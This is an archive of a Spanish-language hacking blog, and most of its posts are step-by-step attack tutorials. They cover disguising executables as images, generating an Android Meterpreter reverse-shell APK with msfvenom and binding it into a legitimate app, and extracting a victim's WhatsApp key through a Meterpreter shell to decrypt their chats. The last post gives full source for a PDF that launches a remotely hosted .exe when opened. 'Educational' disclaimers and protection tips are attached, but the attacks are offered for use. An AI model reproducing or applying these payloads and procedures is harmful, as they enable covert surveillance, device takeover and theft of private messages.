:::: MENU ::::
  • Aprende a usar Kali Linux!

  • Usos del Metasploit!

  • Hacking Ético

Mostrando entradas con la etiqueta Virus. Mostrar todas las entradas
Mostrando entradas con la etiqueta Virus. Mostrar todas las entradas

jueves, 4 de agosto de 2016

Aquí está el tutorial de cómo ocultar un virus o malware dentro de una imagen.




Link del Unicode Input: http://shink.in/TYR91

Link del Resourse Hacker: http://shink.in/SbYLF

Link del Joiner: http://www.connect-trojan.net/2014/04/advanced-file-joiner-v10.html (Pueden utilizar otro Joiner quizá mas actualizado, en el video utilizé este)

En este vídeo se muestra uno de los procesos que se pueden llevar a cabo para poder crear un archivo que parezca una imagen en casi todos sus aspectos, pero que contiene un Malware dentro, en este método se usa el Left to Right Override de Unicode.


IMPORTANTE!

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia a menos que se indique lo contrario.
-Cuculmeca

martes, 2 de agosto de 2016

En este vídeo mostraré solamente que esto "se puede hacer".

A mas tardar el día Miércoles 3 de Agosto se subirá en un nuevo Post uno de los métodos por los cuales es posible realizar esta operación.

Imagen de: http://www.movilzona.es/

Aunque se tiene que aclarar que  lo que se hace es crear un ejecutable que lanza un Malware y la imagen a la vez, pero que tiene pinta de no ser un ejecutable, sino de una imagen cualquiera.

Es algo divertido, y algo ingenioso, la verdad creería que hay varios métodos, aquí compartiré uno de ellos, aunque como deje al principio del post, este será solamente un vídeo de demostración.



IMPORTANTE!

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia a menos que se indique lo contrario.
-Cuculmeca

domingo, 24 de julio de 2016

        3ro. Malware y tipos:



El malware es un Software malicioso que entra a tu PC o a tu Teléfono móvil con el fin de robar información o dañar su Sistema Operativo. Hay varios tipos de malware diferentes que tienen distintas funciones. Estos pueden ser:

-      Virus clásicos: Es un pedazo de código que se añade a otro programa o en un sector del disco. Este al ser ejecutado este virus comienza a replicarse, y así infectando otros sectores dentro de la computadora.

-        Gusano: Son muy similares a los virus, pero estos usan los recursos de red para distribuirse (ósea, pueden replicarse a través de e-mail, o a través de redes). Lo que lo diferencia del virus clásico es que estos se propagan de manera más rápida, y además penetran directamente la memoria RAM de la víctima, y luego ejecutan su código.

-    Troyano O Caballo De Troya: Estos son programas maliciosos los cuales efectúan un montón de acciones sin que el usuario se dé cuenta ya sea: Recolección de datos y envió al creador del troyano, destruyen o alteran datos, causan desperfectos en el ordenador de la víctima, etcétera.  Estos entran a la computadora de la víctima disfrazándose en un programa inofensivo, y así penetran la computadora de la víctima. Estos son mucho más peligrosos que los virus clásicos.

-    Spyware: Es un software el cual se especializa en recolectar información de la víctima. Pueden colectar los datos sobre las acciones del usuario, el contenido del disco duro, software instalado. Estos suelen venir en paquetes de software que parecen inofensivo, estos pueden enviar la información recolectada a través de la red sin que el usuario se de cuenta.


-     Exploit: Es un pedazo de código que se aprovecha de una vulnerabilidad del equipo para conseguir acceso a este y manejarlo de manera remota.

-       Keylogger: Un software que por lo general se encuentra en troyanos, el cual se especializa en recolectar información a través del teclado de la víctima, y luego se envían al creador de este sin que la víctima se dé cuenta.

Bien, ya sé que te estarás preguntando, ¿Por qué en esta guía explico estas dos últimas cosas (puntos 2 y 3)?
Porque esto es fundamental que lo sepas, si quieres ser hacker, como mínimo deberías saber estos tipos de virus (No más nombre los más comunes, ya que hay más), ya que si no te pueden haber infectado y tu ni te pudiste dar cuenta que es con lo que te infectaron.
Bien, pero, ¿Dónde se encuentran (por lo general) estos virus? Por lo general se encuentran en documentos (Word, PDF, etcétera) con nombres como “Guía De Hacking” o “Como hackear Facebook”, etcétera. También se encuentran en archivos ejecutables (.exe , etcétera) ya sea en forma de instaladores o de “programas de hacking” (Nótese las comillas).
Y, ¿Cómo me protejo de estos? Sencillo, debes tener mucho cuidado con lo que descargas y tener un buen antivirus. (Nota: En lo personal recomiendo usar NoDistribute.com, en esta página colocas el archivo y la pagina lo analiza con varios antivirus).

            4to Ser un hacker:


Como ya mencioné antes, para ser un hacker se necesita de mucho tiempo libre y de mucha paciencia. Esto está bastante justificado, nadie se hace hacker de un día para otro. Vas a necesitar aprender muchas cosas, además que es un mundo el cual está constantemente actualizándose. Y aquí viene la pregunta primordial ¿Cómo empiezo en el mundo del Hacking?

Antes de nada, te recomiendo que sigas tu propio camino. ¿Por qué digo esto? Debido a que hay gente que dice que para ser hacker hay que ser ateo, no leer periódicos, no ver televisión, etcétera.

Dicho esto, tienes que decidirte, ¿Qué tipo de hacker quieres ser? ¿Quieres ser alguien que hackee con fines éticos? ¿Qué busque el bien general? ¿O quieres ser alguien que solo busca el bien propio? Ya sé que te estarás preguntando, ¿Por qué necesito saber esto?

Para que te identifiques, si bien los White, Grey y Black Hackers tienen los mismos conocimientos, estos los emplean para diferentes fines. Por ejemplo, los CEH (Certified Ethical Hackers (Hackers Éticos certificados)) estudian seguridad informática Y piensan como un hacker para parar ataques (y así salvar empresas a las cuales son contratados). En cambio, un black hat hacker se especializaría más en atacar que en defenderse (Ojo, no es que no se defiendan, estos se centran más en los ataques).
Lo que aprendas no importa, lo que importa es para que lo empleas.  Recuerda eso.

También hay que darse cuenta la rama de la informática que quieras estudiar. Por ejemplo, no es lo mismo estudiar seguridad informática que criptografía. Decide eso, si quieres protegerte, atacar y protegerte o solo atacar.

Bien, eso queda a decisión tuya. Te recomiendo buscar información de las ramas de la informática, elegir la que más te guste e investigar sobre esa rama.

En fin, eso sería todo. Te recomendaría pensar más de una vez que tipo de hacker quieres ser, ya que luego hay CONSECUENCIAS, pero ojo, no siempre todas las consecuencias son malas…

¿En resumen? Te recomiendo leer un montón, buscar información y siempre tener cuidado con lo que descargues. El mundo del hacking es un mundo muy grande y no es apto para todos…


-Gospel

sábado, 23 de julio de 2016

¿Eres nuevo en el mundo del hacking? ¿No sabes por dónde empezar? ¿No entiendes nada del hacking? ¡Entonces, esta es tu guía! Yo voy a ser quien te asesore en esta guía, sigamos…
De seguro debes tener un millón de preguntas, y esto es entendible, todos fuimos newbies en algún momento, además que el hacking es un mundo muy extenso, y está constantemente actualizándose, en fin, comencemos…

1ro Definición de Hacker y Creencias comunes:

¿Qué es un hacker? ¿Cuál es su objetivo? ¿Qué hacen?
Bueno, un hacker es una persona la cual es experta en la informática, la cual usa estos conocimientos tanto para el bien como para el mal… La mayoría de la gente al escuchar la palabra “Hacker” tiende a pensar en alguien malicioso, o en alguien peligroso, esto puede ser, pero no siempre es así. La gente de por si tiene una mala perspectiva de los hackers (Hasta para algunos es un tabú), pero no todos los hackers tienen fines malos, algunos buscan fallos para arreglarlos; o también están los Ethical Hackers (o Hackers Éticos), los cuales, como la palabra indica, hackean con fines éticos, mayoritariamente estos trabajan en empresas para encontrar y reparar fallos. Iniciar en el mundo del hacking no es fácil para ninguno, debido a que se necesita de mucho tiempo para aprender los temas y paciencia, ya que nada te va a salir bien a la primera. Pero antes de seguir, quiero que te hagas la siguiente pregunta, ¿Con que fin quieres hackear? ¿Lo haces por un fin personal? ¿Por diversión? ¿O Simplemente para aprender? Eso te lo dejo a tu criterio, en fin, prosigamos…

2do Tipos de Hackers:

No todos los hackers tienen el mismo conocimiento ni la misma profesionalidad ni menos los mismos fines, por eso se los clasifican de la siguiente manera:

-          White Hat Hackers (o Hackers De sombrero Blanco): Estas son personas que (como mencione antes) se basan en encontrar y reparar fallos o vulnerabilidades.  Ellos hackean con fines buenos y no con fines maliciosos. También son conocidos como Ethical Hackers.

-          Grey Hat Hacker (o Hackers De sombrero Gris): Son personas que se encuentran en el punto medio, ya que tienen las herramientas para defenderse, pero aun así también para atacar. Estos utilizan sus conocimientos para penetrar sistemas y buscar vulnerabilidades y luego repararlos bajo contrato.

-     Black Hat Hackers (o Hackers De sombrero Negro): Estos vendrían a ser “los malos”, ya que estos utilizan sus conocimientos con fines maliciosos, ya sea crear virus, penetrar sistemas, y etcétera para beneficio propio. Por lo general estos son motivados por el dinero, ya que tratan de obtener datos de tarjetas de crédito o de credenciales para luego venderlos o extorsionarte.

-    Crackers: Son Black Hat Hackers los cuales entran a un sistema vulnerable, para robar información, dejar un virus y crean Backdoors (o puertas traseras) para entrar de nuevo cuando quieran.


-   Phreaker: Es una persona que investiga los sistemas telefónicos, se basan en hackear sistemas telefónicos, telefonía móvil, etc. Estos por lo general tratan de obtener beneficios como llamadas gratis, obtener llamadas de otras personas, etcétera.

-    Hacktivistas: Son Black/Grey Hat Hackers los cuales hackean con fines políticos, ya sea consiguiendo información del partido opositor, y un largo etcétera. Por lo general son contratados por el gobierno o por algún partido político. 

Hay otros tipos de personas que hay en el mundo del hacking, pero estos no son clasificados como hackers. Estos son:
-          Lammers: Son personas que se auto consideran Hackers sin siquiera saber lo que están haciendo.  Se creen más que otros por “saber más”, lo cual no saben. Son bastante irritantes y son una pérdida de tiempo, además está lleno en foros y grupos de hacking. Si alguna vez te cruzas con alguno (Créanme que son muy fácil de reconocer, siempre tratan de llamar la atención diciendo cosas como: “Cállate o te hackeo el Facebook” o “No me molestes o te hackeo tu PC” o cosas por el estilo) ignóralo, son una pérdida de tiempo.

-          Newbie: Es un novato en el mundo de la informática, por lo general descarga un montón de libros y programas para el simple hecho de ver que hacen, y así llenando su PC de malware. Es alguien bastante indefenso que por lo general es confundido con los Lammers, aunque estos últimos exhiben su nulo conocimiento, mientras que los newbies tratan de aprender.

-          Script Kiddie: Estos son gente los cuales descargan muchos programas (sin saber lo que está pasando internamente en la programación) llenando de malware su PC. Aunque usen programas escritos, son bastante inofensivos.


Dime, ¿Tú con cual te identificas? ¿Quieres usar tus conocimientos para el bien o para el mal? ¿O para simplemente exhibirlos? Otra vez, te lo dejo a tu criterio.

Guia hecha por Gospel

miércoles, 13 de julio de 2016

Muy buenas, en esta ocasión les vengo a mostrar algo que muchas personas les interesa saber, y es nada mas y nada menos que encender la cámara de un celular víctima sin que este se percate de esa acción, este ataque lo pueden llevar a cabo los hackers si tienen el control de tu celular por alguna aplicación maliciosa que te hayas descargado.


Lo que se muestra el vídeo es primero la creación de un virus para android en forma de apk por medio del Payload Meterpreter realizando una conexión reversa.




¿Qué es esta conexión reversa?

Bueno cuando se crea el virus se escribe android/meterpreter/reverse_tcp, esto último a lo que llamamos conexión reversa, consiste en que es la víctima la que se conecta a nosotros y no nosotros a la víctima.

¿Por qué?

A principios de este nuevo siglo se usaba muchisimo lo que eran las conexiones directas, pero para eso la PC víctima o el dispositivo víctima debía tener abierto y vulnerable algún puerto, y esto lo utilizaban para entrar y apoderarse de su computadora.

Ahora ya no es así, debido a que nosotros modificamos los puertos de la siguiente manera:

Dentro de LAN: El puerto utilizado para ataques dentro de LAN puede ser cualquiera, ya que técnicamente ambos dispositivos comparten un mismo host que es el router en el que están conectados, así que no se necesita de algún puerto especial para su conexión, si embargo se recomienda no usar puertos que pueden estar utilizados por otras aplicaciones o por Windows, como el Puerto 80, o 8080.

Fuera de LAN: Para los ataques fuera de LAN o en su defecto WAN, se utiliza un puerto que nosotros mismos hayamos abierto, y debido a que es una conexión reversa, la víctima se conecta a nosotros por medio de ese puerto "vulnerable" que hemos abierto, esa es la diferencia entre las conexiones directas y conexiones reversas.(Ya que como se dijo, antes eramos nosotros los que nos conectábamos a la victima por medio de un puerto).
Además en ataques fuera de LAN el host que se utiliza puede ser la IP pública en caso que el router brinde una IP estática, o sino un host creado por ejemplo en NO-IP.

Así que eso sería todo, el tutorial en fotos estará proximamente.

¿Cómo me protejo ante esto?

* Descargar Aplicaciones de páginas de reputación como Playstore.
* No descargar Keygens ni nada que necesite permisos extraordinarios.
* Tener sentido común.
* No instalar cualquier aplicación en el celular.
* Tener analizadores de aplicaciones antes y después de instalarse en el Smartphone.
* Tener actualizadas las aplicaciones, las actualizaciones pueden traer parches de seguridad que mejorarán su privacidad.

IMPORTANTE!

* Todo lo anteriormente hecho se a realizado bajo un régimen cuidadosamente diseñado, se a atacado a mi smartphone y nadie a sido víctima del ataque, además de haberse realizado dentro de la Red LAN.

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

- Cuculmeca

viernes, 8 de julio de 2016

Hola muyyy buenas, este tema de desencriptar bases de datos de WhatsApp se ve mucho por Internet, sin embargo todos esos post, publicaciones, vídeos y demás están desactualizados, la mayoría muestran como desencriptar Bases de datos Crypt 8 y abajo de esta, si embargo sabemos que WhatsApp ya no encripta sus bases de datos en Crypt8, sino que lo hace en nuevos como Crypt 10, Crypt 11, Crypt 12.



En este post mostraré como lograr desencriptar este tipo de base de datos, también las versiones viejas, en realidad es más fácil de lo que se cree, pero puede demorar un poquito (Después de todo la paciencia será la clave del éxito).

El motivo de este post es para que vean que aunque WhatsApp ha hecho muchísimo trabajo con proteger nuestra privacidad han puesto toda la seguridad en la puerta delantera, pero se han olvidado de su puerta trasera, y esto es aprovechado por los cibercriminales para la obtención de tus conversaciones, imágenes y demás.

Antes sugiero que leas la Nota que dice IMPORTANTE, al final del post, así evitarás malentendidos y por consiguiente sabrás completamente el propósito de estos post.

Como siempre vamos a ver los:

Requisitos:

* Primero que nada deberás saber cómo obtener una base de datos de WhatsApp con un virus, esto se aprenderá en uno de los post que ya he hecho aquí.


* Deberás tener descargado el siguiente Software, este nos ayudará a ver gráficamente la base de datos que hemos desencriptado con la herramienta que en el post mencionaré.

* Trabajaremos en Kali Linux, por lo tanto es necesario para casi todos los tutoriales de este blog que tengas instalado el Kali Linux en una Máquina Virtual, en este Link tienes el tutorial de Instalación correcta de esta Distribución.

* Como no obligatorio puedes ver el Funcionamiento de este pequeño virus en el siguiente Post, que explica un procedimiento mas fácil que el que se mostrará en este post y pues se aprenderá un poco de lo que estamos haciendo, en el post se explica como hackear los mensajes de text y los contactos de un smartphone víctima.

Notas:

* Los ataques aquí realizados se aplican para ataques en LAN, si embargo el proceso de desencriptación es lo mismo por si se hace en WAN.


* El ataque se hace para ver que no estamos del todo seguros con este tipo de aplicaciones.

Procedimiento:

1) Primero vamos a sacar la base de datos de WhatsApp:


El tutorial lo dejé en los Requisitos, pero también puedes dar click aquí.

Para desencriptar la base de datos que obtuvimos necesitamos tener una Key, eso es lo que vamos a obtener en los siguientes pasos.

2) Acceder a la Shell:

Entonces debemos estar ya con una sesión abierta de Meterpreter, así podremos seguir, vamos a acceder ahora a la Shell.

Para eso pondremos en los comandos de Meterpreter:


shell

Luego vamos a pedir permiso de Superusuario, deberemos escribir:


su

Si no les deja puede que el teléfono no esté rooteado, para ver eso pueden salirse de la Shell con Crtl + C y ponen check_root.


Y ahora necesitamos copiar la key a la tarjeta SD del Smartphone víctima, para eso debemos ir a la ruta y copiar el archivo, todo eso se hace de la siguiente manera:

cd /data/data/com.whatsapp/files
cp key /sdcard/

Este proceso se puede ver fácilmente en la siguiente imagen. (La imagen no muestra cuando puse shell, esto es porque posteriormente le di "clear" para que me mostrara todo mas limpio.




3) Descargando Key

Ya nos podemos salir de la shell, para eso precionamos Crtl + C y le damos ( y ) para luego darle Enter.


Para descargar la Key, simplemente necesitamos usar el comando download, como ya tenemos copiada nuestra Key a la Sdcard, sólamente vamos a escribir:


download /sdcard/key /root/Escritorio/


NOTA: Muchas veces se puede tener el Kali en Ingles, por lo tanto se debe cambiar "Escritorio" por "Desktop".

Con el comando, estamos descargando la Key y mandandola a nuestro escritorio, a continuación veremos la imagen que demuestra lo anterior.



4) Desencriptando la Base de datos.

Ahora ya tenemos la Key y la Base de datos, este es el lugar donde muchas personas se quedan varadas porque no pueden desencriptar una base de datos que sea mayor a Crypt 8, pero eso lo vamos a solucionar fácilmente.

Aquí vemos los archivos que hemos obtenido hasta ahora:



Ahí esta la Key, y la base de datos (En mi caso tenia pocas conversaciones de WhatsApp, por eso es pequeña, pero la base de datos que ustedes tengan puede que pese 50mb o mas, o menos, dependiendo de cuánta información haya.).

5) Subiendo datos a la plataforma para desencriptar.

Ya con todo eso obtenido vamos a irnos a la Web http://whatcrypt.com/, nos vamos a ir donde dice "Upload Your Crypt 6-12 Key", y como se imaginarán aquí subiremos solamente la Key que obtuvimos.


Aquí la imagen para que se guíen mejor.



6) La Magia casi terminada

En este punto ya está casi terminado todo, vamos a irnos donde dice "Decrypt WhatsApp Database", aquí vamos a subir nuestra base de datos que descargamos, y como podemos ver puede ser desde Crypt 5 hasta Crypt 12 que en el momento de la creación de este post es la mas actual.


Solamente subimos la base de datos y no tocaremos nada.



Ya subida, le vamos a dar donde dice "Process / Download Zip", y vamos a esperar (Este proceso puede durar muchísimo dependiendo del peso de la base de datos, en ocaciones puede durar hasta media hora, pero tranquilos que al final se les descargará un archivo como este:



Ahora mucho OJO, desactiven temporalmente el Internet Download Manager (Si es que lo tienen), porque cuando la página termina de desencriptar, el IDM bloquea la descarga, (Bueno, de hecho es el host el que bloquea, al parecer WhatsApp Decrypt no permite que descarguen de sus servidores con IDM)

Cuando tengan la base de datos desencriptada en Zip, les aparecerán los siguientes archivos:



Ahora ya está todo listo. Vamos al siguiente Paso.

7) Magia Terminada!!!!


Bueno chicuel@s, abrimos la herramienta de WhatsApp Viewer y le damos en → File → Open.

Aquí le daremos a los ( ... ) que aparecen y buscaremos el Archivo Siguiente.



Cuando ya lo escojamos podremos darle en OK.



PUMMM!!!!! MAGIA!!!!!.
Tendremos las conversaciones de WhatsApp de la persona víctima.



Como se puede ver, es relativamente fácil, luego de obtener el control de una víctima robar sus datos, y cosas por el estilo, por eso hay que estar muy atentos a cualquier cosa. Hay que tener mucho cuidado a las aplicaciones que se les da privilegio root, ya que como vemos sin root este proceso sería más complejo.


¿Cómo me protejo ante esto?

* Descargar Aplicaciones de páginas de reputación como Playstore.
* No descargar Keygens ni nada que necesite permisos extraordinarios.
* Tener sentido común.
* No instalar cualquier aplicación en el celular.
* Tener analizadores de aplicaciones antes y después de instalarse en el Smartphone.
* Tener actualizadas las aplicaciones, las actualizaciones pueden traer parches de seguridad que mejorarán su privacidad.

IMPORTANTE!

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

- Cuculmeca

domingo, 3 de julio de 2016

Hoy en día son muchas las personas que bajan aplicaciones para sus Smartphones desde Internet, esto con el objetivo de no pagar lo que vale una aplicación, obtenerla Full, o quizá la aplicación tiene algún "extra" que la hace mejor que la original.

Sin embargo los hackers pueden aprovecharse de tal cosa para meter sus aplicaciones maliciosas fusionadas con aplicaciones que parecen ser inofensivas.


En este post explicaré uno de los métodos que estos pueden usar para ocultar algún virus dentro de una APK común y corriente.

Necesario:

* Una apk maliciosa (Se hará en el primer paso).

* Una apk normal.

* Este software para descompilar apk, su descarga es aquí. (El software no es mio, muchos de los antivirus lo tomarán como un archivo de Malware, usarlo bajo su responsabilidad).

Proceso:

1) Crean el APK Malicioso.

Deberán crear el apk malicioso como se ha hecho en los tutoriales pasados con el comando:

msfvenom -p android/meterpreter/reverse_tcp lhost=[Su Ip Privada] lport=[Número mayor a 5000] R > /root/Escritorio/NombredelaAplicación.apk

NOTA: Donde pone /root/Escritorio, puede ser también /root/Desktop/ esto puede solucionar algún error de ubicación del archivo.


Luego de crear el archivo lo suben a un host de preferencia, en mi caso será Mega, esto es para pasarlo a Windows, donde le haremos unas modificaciones

2) Descompilar apk's.

Para eso debemos tener el programa descargado en una carpeta, y las aplicaciones, normal y aplicación de virus dentro de la carpeta 2-in.

Ahora abren el software y le dan en la opción descompilar (Opción 2), luego les aparecerán sus dos aplicaciones, la creada con el virus y la aplicación normal, vamos a descompilar las dos, así que primero le damos a Opción 1, y luego ponemos Y, y repetimos el proceso con la otra aplicación.

Ahora en la Carpeta 3-Out tendrán las dos aplicaciones descompiladas, ahora vamos a hacerles el trabajito.

3) Mover código.

Primero nos iremos a la carpeta de la aplicación infectada y copiaremos toda la carpeta llamada Metasploit, la encontraremos en /smali/com/ . y la pegaremos en la carpeta de la Aplicacion Normal.

Quedará así mas o menos:


4) Editar código.

Ya movida la carpeta entraremos en la misma, pasaremos por carpetas hasta encontrar MainActivity.smali lo abriremos con un editor, yo les recomiendo Sublime Text.


Copiaremos la Linea 10 y nos saldremos de ahí.


Ahora deberán buscar el mismo archivo MainActivity en la aplicación normal, en la que estoy usando en este tutorial está en esta carpeta.


Ahora vamos a editar ese archivo con el mismo Editor de Texto.

Dentro buscaremos con Crtl+F la palabra OnCreate, pegaremos el código que habíamos copiado debajo del SEGUNDO OnCreate que veamos, así como muestra la imagen.


Guardamos y ya estaría listo.

5) Recompilar aplicaciones.

Ya editada la aplicación, abriremos el Software y daremos a la Opción 3, y luego escogeremos la Aplicación "Normal" (Ya no es normal, porque editamos parte de sus archivos).

Elegiremos la Opción 4.


Ya recompilado nos iremos a la carpeta 4-Done ahí estará nuestra apk lista con el virus que creamos camuflado.

6) Listo!!

Ahí esa aplicación será instalada normalmente por las personas pero traerá regalito, se podrán hacer los procedimientos que se han hecho aquí en el Blog con anterioridad.

¿Cómo me protejo ante esto?

* Descargar Aplicaciones de páginas de reputación como Playstore.
* No descargar Keygens ni nada que necesite permisos extraordinarios.
* Tener sentido común.
* No instalar cualquier aplicación en el celular.
* Tener analizadores de aplicaciones antes y después de instalarse en el Smartphone.

IMPORTANTE!

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

- Cuculmeca
Muy buenas, aquí les mostraré brevemente cómo ocultar un virus dentro de un documento "Amigable".

Estos métodos son usados por algunas personas maliciosas para tener el control de un usuario desde cualquier parte, robar su información, descargarle sus archivos, crearle otros, luego extorsionarlo entre otras actividades delictivas.

Normalmente estos PDF viene camuflados como "Guías de Hacking" o cosas demasiado buenas para ser verdad (OJO que no todas estas guías traerán virus claro está).

Este tutorial en realidad será muy sencillo, copiar y pegar un código, y editarle ciertas cosas.

Primero antes que nada creamos un archivo .txt en cualquier parte de nuestro equipo y le ubicaremos el siguiente código:



%PDF-1.1
1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R
 /OpenAction 8 0 R
>>
endobj
2 0 obj
<<
 /Type /Outlines
 /Count 0
>>
endobj
3 0 obj
<<
 /Type /Pages
 /Kids [4 0 R]
 /Count 1
>>
endobj
4 0 obj
<<
 /Type /Page
 /Parent 3 0 R
 /MediaBox [0 0 612 792]
 /Contents 5 0 R
 /Resources
 << /ProcSet 6 0 R
    /Font << /F1 7 0 R >>
 >>
>>
endobj
5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Aquí se deberá poner todo el texto que llevará el PDF)Tj
ET
endstream
endobj
6 0 obj
[/PDF /Text]
endobj
7 0 obj
<<
 /Type /Font
 /Subtype /Type1
 /Name /F1
 /BaseFont /Helvetica
 /Encoding /MacRomanEncoding
>>
endobj
8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (http://www.host/nombre.exe)
 >>
>>
endobj
xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
 /Size 9
 /Root 1 0 R
>>
startxref
751
%%EOF

A call-to-action text Contact us